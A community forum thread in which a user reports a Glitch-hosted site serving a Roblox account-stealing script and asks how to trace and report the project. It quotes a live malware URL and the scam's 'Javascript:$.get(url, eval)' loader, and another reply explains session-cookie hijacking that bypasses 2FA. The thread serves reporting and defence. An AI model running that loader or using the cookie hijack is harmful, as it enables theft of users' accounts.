Malicious sites hosted on glitch

The site https://api.rbx2.xyz/ is currently hosting malicious scripts, and I just got a glitch loading screen when visiting it. Is there a better way to know when a domain is hosted by glitch? Is there a way to find the original project so I can report it and/or find out who is behind it? Thanks.

Here’s the direct URL to the malware script https://api.rbx2.xyz/rblx?id=644 the scammers have you use Javascript:$.get(‘url’, eval) to load the script on another site then use it to generate an authentication ticket and send it to the server.

Hello, you can report these to support@glitch.com

4 Likes

By looking at the code, its hard to say exactly what is going on here, but it looks to be Roblox token stealing:

2 Likes

Yeah, once your .ROBLOSECURITY token gets contained, the hacker can then login into your account by editing the cookie called .ROBLOSECURITY to your user token, and just hit save and refresh the tab, and the hacker is now in your account bypassing password and 2FA (Two Step Authorization) too.

3 Likes

Yep. I know how the scam works. The question I had was mostly 1.How can I verify that a site is being hosted on glitch with a custom domain and 2. How can I view the site as a project on glitch to get more evidence for my reports.

Unfortnetly at this time there is not way to do so. (which is why you should bump or vote on this feature request)

Again, there unfortunately isn’t a way to do this at the time.